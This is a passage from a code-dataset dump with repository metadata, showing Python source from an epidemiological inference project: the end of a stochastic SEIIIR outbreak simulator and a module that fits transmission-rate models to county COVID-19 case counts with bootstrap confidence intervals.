0 to the beginning of cm_rep_cases (to start at 0)\n for i in range(len(cm_rep_cases_dates)-1):\n dates.append(cm_rep_cases_dates[i]-delta)\n\n cumulative_reported_cases = Bunch(dates=cm_rep_cases_dates, values=cm_rep_cases)\n SEIIIR = Bunch(dates=dates, S=S, E=E, I1=I1, I2=I2, I3=I3, R=R, transmissions=T)\n return Bunch(cumulative_reported_cases=cumulative_reported_cases, SEIIIR=SEIIIR)\n\n\ndef simulate_discrete_seiiir_stochastic(y0, tf, beta, sigma, gamma, rho, N, report_delay, tx):\n assert tf > 1 and type(tf) is int\n assert N > 1\n assert y0['S'] <= N\n assert y0['E'] <= N\n assert y0['I1'] <= N\n assert y0['I2'] <= N\n assert y0['I3'] <= N\n assert y0['R'] <= N\n assert y0['S'] >= 0\n assert y0['E'] >= 0\n assert y0['I1'] >= 0\n assert y0['I2'] >= 0\n assert y0['I3'] >= 0\n assert y0['R'] >= 0\n assert beta >= 0\n assert sigma >=0\n assert gamma >= 0\n assert rho >= 1\n assert report_delay >= 1 and type(report_delay) is int\n assert tf > report_delay+1\n if tx is None:\n tx = [0]*tf\n\n\n # expand the parameters if necessary\n assert type(beta) is float or (type(beta) is np.ndarray and beta.dtype == np.float64)\n assert type(sigma) is float or (type(sigma) is np.ndarray and sigma.dtype == np.float64)\n assert type(gamma) is float or (type(gamma) is np.ndarray and gamma.dtype == np.float64)\n #assert type(report_delay) is int or (type(report_delay) is np.ndarray and report_delay.dtaype == np.int64)\n #assert type(rho) is float or (type(rho) is np.ndarray and rho.dtype == np.int64)\n\n if type(beta) is float:\n beta = beta*np.ones(tf)\n if type(sigma) is float:\n sigma = sigma*np.ones(tf)\n if type(gamma) is float:\n gamma = gamma*np.ones(tf)\n #if type(report_delay) is int:\n # report_delay = report_delay*np.ones(tf).astype(np.int64)\n if type(rho) is float:\n rho = rho*np.ones(tg)\n\n S = [None]*tf\n E = [None]*tf\n T = [None]*tf # new transmissions\n I1 = [None]*tf\n I2 = [None]*tf\n I3 = [None]*tf\n R = [None]*tf\n\n S[0] = y0['S']\n E[0] = y0['E']\n I1[0] = y0['I1']\n I2[0] = y0['I2']\n I3[0] = y0['I3']\n R[0] = y0['R']\n\n p_EI = 1-np.exp(-sigma)\n p_II = 1-np.exp(-3*gamma)\n for t in range(0,tf-1):\n p_expose = 1-np.exp(-beta[t]*(I1[t]+I2[t]+I3[t])/N)\n T[t] = np.random.binomial(S[t], p_expose) + tx[t]\n Etout = np.random.binomial(E[t], p_EI[t])\n I1tout = np.random.binomial(I1[t], p_II[t])\n I2tout = np.random.binomial(I2[t], p_II[t])\n I3tout = np.random.binomial(I3[t], p_II[t])\n S[t+1] = S[t] - T[t]\n E[t+1] = E[t] + T[t] - Etout\n I1[t+1] = I1[t] + Etout - I1tout\n I2[t+1] = I2[t] + I1tout - I2tout\n I3[t+1] = I3[t] + I2tout - I3tout\n R[t+1] = R[t] + I3tout\n\n # get the last entry for transmissions\n T[tf-1] = np.random.binomial(S[tf-1], p_expose) + tx[tf-1]\n\n cm_rep_cases = [0]*(tf+1)\n for tp in range(1,tf+1):\n cm_rep_cases[tp] = cm_rep_cases[tp-1] + 1/rho*T[tp-1]\n\n # create and shift the dates to account for reporting delay\n cm_rep_cases_dates = pd.date_range(end=datetime(year=2020, month=5, day=15), periods=len(cm_rep_cases)).to_pydatetime().tolist()\n dates = list()\n delta = timedelta(days=report_delay-1) # the -1 is because we add a 0 to the beginning of cm_rep_cases (to start at 0)\n for i in range(len(cm_rep_cases_dates)-1):\n dates.append(cm_rep_cases_dates[i]-delta)\n\n cumulative_reported_cases = Bunch(dates=cm_rep_cases_dates, values=cm_rep_cases)\n SEIIIR = Bunch(dates=dates, S=S, E=E, I1=I1, I2=I2, I3=I3, R=R, transmissions=T)\n return Bunch(cumulative_reported_cases=cumulative_reported_cases, SEIIIR=SEIIIR)\n\n \n" }, { "alpha_fraction": 0.49942541122436523, "alphanum_fraction": 0.5055186152458191, "avg_line_length": 42.91901397705078, "blob_id": "3c8e224dfe8f67900623a8bf9d30374df0d21644", "content_id": "cc734e9f983889e17d58a5163b0b423eb5b2733f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 37419, "license_type": "no_license", "max_line_length": 237, "num_lines": 852, "path": "/epi_inference/ATTIC/inference.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import csv\nimport json\nimport sys\nimport os\nimport math\nimport numpy\nimport datetime\nimport random\nimport pandas as pd\nimport yaml\nimport matplotlib.pyplot as plt\nfrom pyutilib.misc import Options\nfrom pyutilib.misc.timing import TicTocTimer\nfrom pyomo.environ import value\n\nfrom .util import factorial_iterator\nfrom .util import ToStr_JSONEncoder\nfrom . import formulations as frms\n\n\n#\n# Load data from a CSV file generated by 'epiinf collect'\n#\ndef load_csv_data(input_csv):\n df = pd.read_csv(input_csv, parse_dates=['Date'])\n df = df.set_index('Date')\n\n metadata = {}\n metafile = input_csv[:-4]+\"_meta.yml\"\n if os.path.isfile(metafile):\n with open(metafile, 'r') as INPUT:\n try:\n metadata = yaml.safe_load(INPUT)\n except yaml.YAMLError as exc: # pragma: no cover\n print(\"ERROR: problem parsing YAML file \"+metafile)\n print(exc)\n sys.exit(1)\n\n return df, metadata\n\n#\n# Load geodata from a CSV file\n#\n\"\"\"\nTODO - delete\n\ndef load_geodata(geodata_csv):\n if not os.path.exists(geodata_csv): # pragma: no cover\n print(\"ERROR: missing file \"+geodata_csv)\n sys.exit(1)\n return pd.read_csv(geodata_csv, index_col='geoid')\n\"\"\"\n\n#\n# Process the arguments used for inference\n#\ndef process_config(cfg):\n config = Options()\n\n config.formulation = cfg['formulation']\n config.ntrials = cfg.get('ntrials', None)\n config.input_csv = cfg['input_csv']\n #config.output_json = cfg.get('output_json',None)\n config.population = cfg.get('population', None)\n config.filter_counties_by_cases = cfg.get('filter_counties_by_cases', 0)\n config.county = cfg.get('county', None)\n config.column = cfg.get('column', None)\n config.reporting_factor = cfg.get('reporting_factor', 1.0)\n config.deltaP = cfg.get('deltaP', 7)\n config.sigma = cfg.get('sigma', None)\n config.gamma = cfg.get('gamma', None)\n config.mobility_json = cfg.get('mobility_json', None)\n config.factor_levels = cfg.get('factor_levels', None)\n config.bootstrap = cfg.get('bootstrap', Options())\n config.analysis_window = cfg.get('analysis_window', Options())\n\n # TODO - deprecate the use of the geodata CSV file option\n if 'population_csv' not in cfg:\n config.population_csvfile = cfg.get('geodata_csv', config.input_csv[:-4] + \"_geodata.csv\")\n config.population_csvcolumn = 'pop2010'\n config.population_csvindex = 'geoid'\n else:\n config.population_csvfile = cfg['population_csv']['file']\n config.population_csvcolumn = cfg['population_csv']['population']\n config.population_csvindex = cfg['population_csv']['index']\n\n return config\n\ndef check_config(config):\n if config.county is not None and type(config.county) is not str: # pragma: no cover\n print(\"ERROR: county id must be specified as a string\")\n sys.exit(1)\n try:\n assert(os.path.exists(config.input_csv))\n except: # pragma: no cover\n print(\"ERROR: input file \"+config.input_csv+\" does not exist\")\n raise\n assert type(config.reporting_factor) is float\n \ndef run_single_node_from_config(df, population_df, CONFIG, verbose):\n column = CONFIG.column\n ntrials = CONFIG.get('ntrials', df.columns)\n formulation = CONFIG.formulation\n filter_counties_by_cases = CONFIG.filter_counties_by_cases\n population_config = CONFIG.population\n population_csvcolumn = CONFIG.population_csvcolumn\n sigma = CONFIG.sigma\n gamma = CONFIG.gamma\n report_delay = CONFIG.deltaP\n reporting_factor = CONFIG.reporting_factor\n analysis_window = CONFIG.analysis_window\n\n all_results = list()\n ndx = 0\n\n for t in df:\n if column is not None and t != column:\n continue\n ndx = ndx+1\n if not ntrials is None and ndx > ntrials:\n break\n\n if population_config is None:\n if t not in population_df[population_csvcolumn]: # pragma: no cover\n print(\"WARNING: county \"+str(t)+\" does not have population data available.\")\n continue\n population = population_df[population_csvcolumn][t]\n else:\n population = population_config\n cm_rep_cases = df[t].to_list()\n Cdates = df.index.to_list()\n\n #if df[t][-1] == 0:\n # results = {'est_beta':None, 'status':'skipped', 'msg':'No case data', 'population': population, 'total_cases': float(df[t][-1])}\n\n if df[t][-1] <= filter_counties_by_cases:\n results = {'est_beta':None, 'status':'skipped', 'msg':'cumulative cases <= {} (filter_counties_by_cases)'.format(filter_counties_by_cases), 'population': population, 'total_cases': float(df[t][-1])}\n\n elif formulation == 'decay-lsq':\n results = frms.run_decay_lsq(cm_rep_cases=cm_rep_cases,\n population=population,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n Cdates=Cdates)\n elif formulation == 'decay-blike':\n results = frms.run_decay_blike(cm_rep_cases=cm_rep_cases,\n population=population,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n Cdates=Cdates)\n \"\"\"\n elif formulation == 'decay-multibeta-lsq':\n results = frms.run_decay_multibeta_lsq(cm_rep_cases=cm_rep_cases,\n population=population,\n sigma=sigma,\n gamma=gamma,\n deltaP=report_delay,\n reporting_factor=reporting_factor)\n # analysis_window=analysis_window)\n \"\"\"\n else: # pragma: no cover\n print(\"ERROR: unknown formulation '%s'\" % formulation)\n sys.exit(1)\n\n results['FIPS'] = t\n #\n # Collect results in a list\n #\n all_results.append( results )\n return all_results\n\ndef run_multinode_from_config(df, population_df, CONFIG, verbose):\n formulation = CONFIG.formulation\n sigma = CONFIG.sigma\n gamma = CONFIG.gamma\n filter_counties_by_cases = CONFIG.filter_counties_by_cases\n report_delay = CONFIG.deltaP\n reporting_factor = CONFIG.reporting_factor\n analysis_window = CONFIG.analysis_window\n mobility_dict = CONFIG.mobility_dict\n bootstrap = CONFIG.bootstrap\n bootstrap_percentile = bootstrap.get('percentile',5)\n bootstrap_n = bootstrap.get('n',100)\n bootstrap_seed = bootstrap.get('seed',None)\n bootstrap_value = bootstrap.get('value','est_beta')\n bootstrap_output_csv = bootstrap.get('output_csv', None)\n bootstrap_weighted = bootstrap.get('weighted', False)\n\n #\n # Error checking\n #\n nodes = [val for val in df.keys().to_list()]\n flag=False\n active_nodes = []\n for n in nodes:\n if not n in population_df: # pragma: no cover\n flag=True\n print(\"Population is missing for county: \"+str(n))\n if df[n][-1] > filter_counties_by_cases:\n active_nodes.append(n)\n else:\n print(\"WARNING: Skipping county '\"+str(n)+\"' in multinode estimation because it has no cases\")\n if flag: # pragma: no cover\n sys.exit(1)\n if len(active_nodes) == 0:\n return {'fraction_of_counties_with_cases': 0, 'est_beta':None}\n\n if bootstrap:\n if bootstrap_weighted:\n bootstrap_weights = population_df[active_nodes].copy()\n else:\n bootstrap_weights = population_df[active_nodes].copy()\n bootstrap_weights[bootstrap_weights.index] = 1\n\n #testing_bootstrap = population_df[active_nodes].copy()\n #testing_bootstrap[testing_bootstrap.index] = 0\n\n if bootstrap_seed is not None:\n random.seed(bootstrap_seed)\n\n all_results = []\n for i in range(bootstrap_n):\n DF = df.sample(n=len(df.keys()), replace=True, axis=1, random_state=random.randint(1000000,9999999), weights=bootstrap_weights)\n sampled_nodes = [val for val in DF.keys().to_list()]\n\n #for n in sampled_nodes:\n # testing_bootstrap[n] = testing_bootstrap[n] + 1\n populations = population_df[sampled_nodes]\n\n if formulation == 'multinode-decay-lsq':\n results = frms.run_multinode_decay_lsq(DF,\n populations=populations,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=reporting_factor,\n Cdates=df.index.tolist())\n elif formulation == 'multinode-decay-blike':\n results = frms.run_multinode_decay_blike(DF,\n population=populations,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n analysis_window=dict(),\n reporting_factor=reporting_factor,\n Cdates=df.index.tolist())\n# elif formulation == 'multinode-decay-multibeta-lsq':\n# results = frms.run_multinode_decay_multibeta_lsq(DF,\n# population=populations,\n# sigma=sigma,\n# gamma=gamma,\n# deltaP=report_delay,\n# reporting_factor=reporting_factor)\n else:\n raise RuntimeError(\"Unknown formulation: \"+formulation)\n all_results.append(results)\n\n #print(testing_bootstrap/ (len(testing_bootstrap)*bootstrap_n))\n #print(bootstrap_weights/ sum(bootstrap_weights))\n #\n # Do the estimate with all the data\n #\n\n if formulation == 'multinode-decay-lsq':\n results = frms.run_multinode_decay_lsq(df[active_nodes],\n populations=population_df[active_nodes],\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=dict(),\n Cdates=df.index.tolist())\n elif formulation == 'multinode-decay-blike':\n results = frms.run_multinode_decay_blike(df[active_nodes],\n population=population_df[active_nodes],\n sigma=sigma,\n gamma=gamma,\n deltaP=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=dict(),\n Cdates=df.index.tolist())\n elif formulation == 'multinode-mobility-decay-lsq':\n results = frms.run_multinode_mobility_decay_lsq(df[active_nodes],\n populations=population_df[active_nodes],\n mobility=mobility_dict,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n Cdates=df.index.tolist())\n elif formulation == 'multinode-mobility-window-decay-lsq':\n results = frms.run_multinode_mobility_window_decay_lsq(df[active_nodes],\n populations=population_df[active_nodes],\n mobility=mobility_dict,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n Cdates=df.index.tolist())\n elif formulation == 'multinode-mobility-time-varying-decay-lsq':\n results = frms.run_multinode_mobility_time_varying_decay_lsq(df[active_nodes],\n populations=population_df[active_nodes],\n mobility=mobility_dict,\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n Cdates=df.index.tolist())\n# elif formulation == 'multinode-decay-multibeta-lsq':\n# results = frms.run_multinode_decay_multibeta_lsq(df[active_nodes],\n# population=population_df[active_nodes],\n# sigma=sigma,\n# gamma=gamma,\n# deltaP=report_delay,\n# reporting_factor=reporting_factor)\n else:\n raise RuntimeError(\"Unknown formulation: \"+formulation)\n\n\n #\n # Compute the confidence interval\n #\n if bootstrap:\n values = [r[bootstrap_value] for r in all_results]\n values.sort()\n results['bootstrap_mean_beta'] = numpy.mean(values)\n #results['bootstrap_mean_beta'] = statistics.mean(values)\n quantiles = [ \n numpy.quantile(values, bootstrap_percentile/100, axis=0),\n numpy.quantile(values, 1.0-bootstrap_percentile/100, axis=0)\n ]\n #quantiles = statistics.quantiles(values, n=100//bootstrap_percentile)\n results['bootstrap_'+str(bootstrap_percentile)+'%'] = quantiles[0]\n results['bootstrap_'+str(100-bootstrap_percentile)+'%'] = quantiles[-1]\n if verbose:\n print(\"Bootstrap Value\")\n print(values)\n print(\"Quantiles\")\n print(quantiles)\n if bootstrap_output_csv is not None:\n bootstrap_df = pd.DataFrame(values, columns=[\"est_beta\"])\n bootstrap_df.to_csv(bootstrap_output_csv, quoting=csv.QUOTE_NONNUMERIC)\n\n assert(len(nodes) == len(df.keys()))\n results['num_counties'] = len(df.keys())\n results['fraction_of_counties_with_cases'] = len(active_nodes)/len(df.keys())\n return [results]\n\ndef run_multibeta_from_config(df, population_df, CONFIG, verbose):\n formulation = CONFIG.formulation\n sigma = CONFIG.sigma\n gamma = CONFIG.gamma\n filter_counties_by_cases = CONFIG.filter_counties_by_cases\n \n report_delay = CONFIG.deltaP\n reporting_factor = CONFIG.reporting_factor\n analysis_window = CONFIG.analysis_window\n\n #\n # Error checking\n #\n nodes = [val for val in df.keys().to_list()]\n flag=False\n active_nodes = []\n for n in nodes:\n if not n in population_df: # pragma: no cover\n flag=True\n print(\"Population is missing for county: \"+str(n))\n if df[n][-1] > filter_counties_by_cases:\n active_nodes.append(n)\n else:\n print(\"WARNING: Skipping county '\"+str(n)+\"' in multinode estimation because it has no cases\")\n if flag: # pragma: no cover\n sys.exit(1)\n if len(active_nodes) == 0:\n return {'fraction_of_counties_with_cases': 0, 'est_beta':{}, 'est_omega':{}}\n\n #\n # Do the estimate with all the data\n #\n if formulation == 'multibeta-singleomega-decay-lsq':\n results = frms.run_multibeta_singleomega_decay_lsq(df[active_nodes],\n populations=population_df[active_nodes],\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=dict())\n elif formulation == 'multibeta-singleomegawin-decay-lsq':\n results = frms.run_multibeta_singleomegawin_decay_lsq(df[active_nodes],\n populations=population_df[active_nodes],\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window)\n elif formulation == 'multibeta-singleomegawin-decay-l1':\n results = frms.run_multibeta_singleomegawin_decay_l1(df[active_nodes],\n populations=population_df[active_nodes],\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window)\n elif formulation == 'multibeta-multiwin-decay-lsq':\n results = frms.run_multibeta_multiwin_decay_lsq(df[active_nodes],\n populations=population_df[active_nodes],\n sigma=sigma,\n gamma=gamma,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n Cdates=df.index.tolist())\n else:\n raise RuntimeError(\"ERROR: Unknown model - \"+formulation)\n\n assert(len(nodes) == len(df.keys()))\n results['num_counties'] = len(df.keys())\n results['fraction_of_counties_with_cases'] = len(active_nodes)/len(df.keys())\n return [results]\n\n\n\"\"\"\nExample YAML file\ninference:\n - formulation: delay-ln-lsq\n deltaE: 5\n deltaI: 4\n deltaP: 7 # reporting delay (from time of infection to reported case)\n reportingfac: 1.0 # reporting factor (5 means actual cases = 5*reported)\n population: 4500000\n datafilename: data.csv\n daysbefore: 5 # number of days to include before the first case\n daysafter: 28 # number of days of data to include after the first case\n - formulation: delay-lsq\n sigma: 0.1923076923 # 1/5.2\n gamma: 0.25 # 1/4\n deltaP: 7\n population: 4500000\n datafilename: data.csv\n daysbefore: 5 # number of days to include before the first case\n daysafter: 28 # number of days of data to include after the first case\n\"\"\"\ndef run(args):\n with open(args.config_file, 'r') as fd:\n config = yaml.safe_load(fd)\n\n if 'inference' not in config:\n raise ValueError('No \"inference\" key found in the YAML config')\n\n timer = TicTocTimer()\n for cfg in config.get('inference', []):\n timer.tic('Starting Inference')\n verbose = cfg.get('verbose', args.verbose)\n factors = cfg.get('factors', None)\n output_csv = cfg.get('output_csv', None)\n output_json = cfg.get('output_json', None)\n\n assert output_csv is not None or output_json is not None \n assert type(verbose) is bool\n \n config = process_config(cfg)\n if verbose:\n print('Inference Configuration:\\n', config)\n\n all_results = []\n\n if factors is None:\n config_list = [config]\n else:\n config_list = factorial_iterator(factors, config)\n\n for CONFIG in config_list:\n try:\n population_df = pd.read_csv(CONFIG.population_csvfile, encoding=\"ISO-8859-1\", dtype={CONFIG.population_csvindex:'str'})\n population_df = population_df.set_index(CONFIG.population_csvindex)\n except:\n print(\"ERROR reading file \"+CONFIG.population_csvfile)\n raise\n check_config(CONFIG)\n if CONFIG.population is None and CONFIG.county is not None:\n CONFIG.population = population_df[CONFIG.population_csvcolumn][CONFIG.county]\n if verbose:\n print(\"County: %s Population: %s\" % (str(CONFIG.county), str(CONFIG.population)))\n\n print(\"Input File: \"+CONFIG.input_csv+' with column '+str(CONFIG.column))\n #\n # Load the dataframe and experimental metadata (if it's available)\n #\n df, metadata = load_csv_data(CONFIG.input_csv)\n data = metadata.get('simulation parameters', None)\n if data is not None:\n if CONFIG.verbose:\n print('parameters used to create data')\n print(data)\n for key, value in data.items():\n CONFIG[key] = value\n\n #\n # load mobility data if needed\n #\n CONFIG.mobility_dict = {}\n if CONFIG.mobility_json is not None:\n try:\n with open(CONFIG.mobility_json, 'r') as fd:\n CONFIG.mobility_dict = json.load(fd)\n except:\n print(\"ERROR reading file \" + CONFIG.mobility_json)\n raise\n \n #\n # Execute inference\n #\n if CONFIG.formulation in ['decay-lsq', 'decay-blike', 'decay-multibeta-lsq']:\n results = run_single_node_from_config(df, population_df, CONFIG, verbose)\n elif CONFIG.formulation in ['multinode-mobility-time-varying-decay-lsq', 'multinode-mobility-window-decay-lsq', 'multinode-mobility-decay-lsq', 'multinode-decay-lsq', 'multinode-decay-blike', 'multinode-decay-multibeta-lsq']:\n results = run_multinode_from_config(df, population_df[CONFIG.population_csvcolumn], CONFIG, verbose)\n elif CONFIG.formulation.startswith('multibeta-'):\n results = run_multibeta_from_config(df, population_df[CONFIG.population_csvcolumn], CONFIG, verbose)\n else:\n raise ValueError('Invalid formulation', CONFIG.formulation, 'found in YAML file inference section.')\n #\n # Augment reported results\n #\n for trial in results:\n if data is not None:\n trial['est_R0'] = trial['est_beta']/float(data['gamma'])\n for key, value in data.items():\n if not key in trial:\n trial[key] = value\n if CONFIG.factor_levels is not None:\n for key, value in CONFIG.factor_levels.items():\n if not key in trial:\n trial[key] = value\n all_results.append( trial )\n \n #\n # Save results\n #\n if output_csv:\n print(\"Writing results in file \"+output_csv)\n filedir = os.path.dirname(output_csv)\n if not os.path.exists(filedir):\n os.makedirs(filedir)\n all_df = pd.DataFrame(all_results)\n all_df.to_csv(output_csv, index=False, quoting=csv.QUOTE_NONNUMERIC)\n else:\n print(\"Writing results in file \"+output_json)\n filedir = os.path.dirname(output_json)\n if not os.path.exists(filedir):\n os.makedirs(filedir)\n with open(output_json, 'w') as OUTPUT:\n tmp = json.dumps(all_results, indent=4, cls=ToStr_JSONEncoder)\n OUTPUT.write(tmp)\n all_df = None\n #\n # Create a YAML file with metadata\n #\n metadata = {}\n metadata['timestamp'] = str(datetime.datetime.now())\n metadata['configuration'] = {}\n for key in cfg:\n metadata['configuration'][key] = cfg[key]\n if output_csv:\n metaoutput = output_csv[:-4]+\"_meta.yml\" \n elif output_json.endswith('.json'):\n metaoutput = output_json[:-5]+\"_meta.yml\" \n elif output_json.endswith('.jsn'):\n metaoutput = output_json[:-4]+\"_meta.yml\" \n print(\"Writing results metadata in file \"+metaoutput)\n with open(metaoutput, 'w') as OUTPUT:\n yaml.dump(metadata, OUTPUT)\n #\n # Print data\n #\n if verbose:\n if all_df is None:\n print(json.dumps(all_results, indent=4, cls=ToStr_JSONEncoder))\n else:\n pd.set_option('display.max_rows', 100000)\n print(all_df)\n\n timer.toc('Completed Inference')\n\n timer.tic('Completed All Inference Computations')\n\n\n\"\"\"\nThis is the previous version of 'run'. I'm caching this here so we can\nquickly go back to it.\n\nExample YAML file\ninference:\n - formulation: delay-ln-lsq\n deltaE: 5\n deltaI: 4\n deltaP: 7 # reporting delay (from time of infection to reported case)\n reportingfac: 1.0 # reporting factor (5 means actual cases = 5*reported)\n population: 4500000\n datafilename: data.csv\n daysbefore: 5 # number of days to include before the first case\n daysafter: 28 # number of days of data to include after the first case\n - formulation: delay-lsq\n sigma: 0.1923076923 # 1/5.2\n gamma: 0.25 # 1/4\n deltaP: 7\n population: 4500000\n datafilename: data.csv\n daysbefore: 5 # number of days to include before the first case\n daysafter: 28 # number of days of data to include after the first case\n\ndef run_old(args):\n with open(args.config_file, 'r') as fd:\n config = yaml.safe_load(fd)\n\n if 'inference' and 'batch_inference' not in config:\n raise ValueError('No inference or batch_inference key found in the YAML config')\n\n for cfg in config.get('inference', []):\n all_results = list()\n verbose = cfg.get('verbose', args.verbose)\n assert type(verbose) is bool\n \n if verbose:\n print('Inference Configuration:', cfg)\n \n formulation = cfg['formulation']\n ntrials = cfg.get('ntrials', None)\n\n input_csv = cfg['input_csv']\n assert(os.path.exists(input_csv))\n geodata_csv = input_csv[:-4] + \"_geodata.csv\"\n geodata_df = load_geodata(geodata_csv)\n\n population = cfg.get('population', None)\n county = cfg.get('county', None)\n assert(not ((population is None) and (county is None)))\n\n column = cfg.get('column', None)\n reporting_factor = cfg.get('reporting_factor', 1.0)\n assert type(reporting_factor) is float\n\n print(\"Input File: \"+input_csv+' with column '+str(column))\n if formulation == 'decay-lsq' or formulation == 'decay-blike':\n df, metadata = load_csv_data(input_csv)\n data = metadata['simulation parameters']\n ntrials = cfg.get('ntrials', df.columns)\n if verbose:\n print('parameters used to create data')\n print(data)\n\n if population is None:\n population = geodata_df['pop2010'][county]\n if verbose:\n print(\"County: %s Population: %s\" % (str(county), str(population)))\n\n ndx = 0\n for t in df:\n if column is not None and t != column:\n continue\n \n ndx = ndx+1\n if not ntrials is None and ndx > ntrials:\n break\n\n # get the data - this will change with Bill's new stuff\n cm_rep_cases = df[t].to_list()\n\n sigma = cfg['sigma']\n gamma = cfg['gamma']\n deltaP = cfg['deltaP']\n\n if formulation == 'decay-lsq':\n results = frms.run_decay_lsq(cm_rep_cases=cm_rep_cases,\n population=population,\n sigma=sigma,\n gamma=gamma,\n deltaP=deltaP,\n reporting_factor=reporting_factor)\n else:\n # formulation == 'decay-blike'\n results = frms.run_decay_blike(cm_rep_cases=cm_rep_cases,\n population=population,\n sigma=sigma,\n gamma=gamma,\n deltaP=deltaP,\n reporting_factor=reporting_factor)\n\n results['est_R0'] = results['est_beta']/float(data['gamma'])\n results['true_beta'] = float(data['beta'])\n results['true_R0'] = float(data['beta'])/float(data['gamma'])\n all_results.append(results)\n\n elif formulation == 'delay-ln-lsq':\n raise NotImplementedError('Formulation ' + formulation + ' is not ready.')\n df, metadata = load_csv_data(input_csv)\n data = metadata['simulation parameters']\n if population is None:\n population = geodata_df['pop2010'][county]\n if verbose:\n print(\"County: %s Population: %s\" % (str(county), str(population)))\n if verbose:\n print('parameters used to create data')\n print(data)\n for col in df:\n # get the data - this will change with Bill's new stuff\n cm_rep_cases = df[col].to_list()\n\n deltaE = cfg['deltaE']\n assert type(deltaE) is int and deltaE > 0\n deltaI = cfg['deltaI']\n assert type(deltaI) is int and deltaI > 0\n deltaP = cfg['deltaP']\n assert type(deltaP) is int and deltaP > 0\n\n results = frms.run_delay_ln_lsq(cm_rep_cases=cm_rep_cases,\n population=population,\n deltaE=deltaE,\n deltaI=deltaI,\n deltaP=deltaP,\n reporting_factor=reporting_factor,\n geodata_df=geodata_df)\n\n results['est_R0'] = results['est_beta']/float(data['gamma'])\n results['true_beta'] = float(data['beta'])\n results['true_R0'] = float(data['beta'])/float(data['gamma'])\n print(results)\n\n elif formulation == 'delay-lsq':\n #all_results = list()\n df, metadata = load_csv_data(input_csv)\n data = metadata['simulation parameters']\n if population is None:\n population = geodata_df['pop2010'][county]\n if verbose:\n print(\"County: %s Population: %s\" % (str(county), str(population)))\n if verbose:\n print('parameters used to create data')\n print(data)\n for col in df:\n # get the data - this will change with Bill's new stuff\n cm_rep_cases = df[col].to_list()\n\n deltaE = cfg['deltaE']\n assert type(deltaE) is int and deltaE > 0\n deltaI = cfg['deltaI']\n assert type(deltaI) is int and deltaI > 0\n deltaP = cfg['deltaP']\n assert type(deltaP) is int and deltaP > 0\n\n results = frms.run_delay_lsq(cm_rep_cases=cm_rep_cases,\n population=population,\n deltaE=deltaE,\n deltaI=deltaI,\n deltaP=deltaP,\n reporting_factor=reporting_factor,\n geodata_df=geodata_df)\n\n results['est_R0'] = results['est_beta']/float(data['gamma'])\n results['true_beta'] = float(data['beta'])\n results['true_R0'] = float(data['beta'])/float(data['gamma'])\n\n else:\n raise ValueError('Invalid formulation', formulation, 'found in YAML file inference section.')\n\n all_df = pd.DataFrame(all_results)\n all_df.to_csv('inference_tests.csv', index=False, quoting=csv.QUOTE_NONNUMERIC)\n pd.set_option('display.max_rows', 100000)\n print(all_df)\n\n #\n # Process batch_inference blocks\n #\n for cfg in config.get('batch_inference', []):\n verbose = cfg.get('verbose', args.verbose)\n factors = cfg.get('factors', None)\n config = cfg.get('config', None)\n output = cfg.get('output', None)\n\n assert factors is not None\n assert config is not None\n assert output is not None\n assert type(verbose) is bool\n \n config = process_config(config)\n if verbose:\n print('Inference Configuration:\\n', config)\n all_results = list()\n\n for CONFIG in factorial_iterator(factors, config):\n geodata_df = load_geodata(CONFIG.geodata_csv)\n if CONFIG.population is None:\n CONFIG.population = geodata_df['pop2010'][CONFIG.county]\n if verbose:\n print(\"County: %s Population: %s\" % (str(CONFIG.county), str(CONFIG.population)))\n\n check_config(CONFIG)\n print(\"Input File: \"+CONFIG.input_csv+' with column '+str(CONFIG.column))\n\n if CONFIG.formulation == 'decay-lsq' or CONFIG.formulation == 'decay-blike':\n all_results.extend( run_decay_lsq(CONFIG, verbose) )\n else:\n raise ValueError('Invalid formulation', CONFIG.formulation, 'found in YAML file inference section.')\n\n all_df = pd.DataFrame(all_results)\n #\n # Save results\n #\n print(\"Writing results in file \"+output)\n all_df.to_csv(output, index=False, quoting=csv.QUOTE_NONNUMERIC)\n #\n # Create a YAML file with metadata\n #\n metadata = {}\n metadata['timestamp'] = str(datetime.datetime.now())\n metadata['configuration'] = {}\n for key in cfg:\n metadata['configuration'][key] = cfg[key]\n metaoutput = output[:-4]+\"_meta.yml\" \n print(\"Writing results metadata in file \"+metaoutput)\n with open(metaoutput, 'w') as OUTPUT:\n yaml.dump(metadata, OUTPUT)\n #\n # Print data\n #\n pd.set_option('display.max_rows', 100000)\n print(all_df)\n\"\"\"\n\n\"\"\"\n df = pd.DataFrame(results)\n if args.resfile is not None:\n df.to_csv(args.resfile, index=False)\n\n print(df)\n print('Mean values:')\n print(df.mean())\n print(df.std())\n df.hist()\n #plt.title('foo')\n #plt.show()\n\"\"\"\n" }, { "alpha_fraction": 0.8275862336158752, "alphanum_fraction": 0.8275862336158752, "avg_line_length": 37.66666793823242, "blob_id": "338affff7cf955cac26950d43705265e44392c06", "content_id": "0903e3f4fde722d010de39b868e7db1255a4c93c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 116, "license_type": "no_license", "max_line_length": 83, "num_lines": 3, "path": "/epi_inference/viz/choropleth/__init__.py", "repo_name": 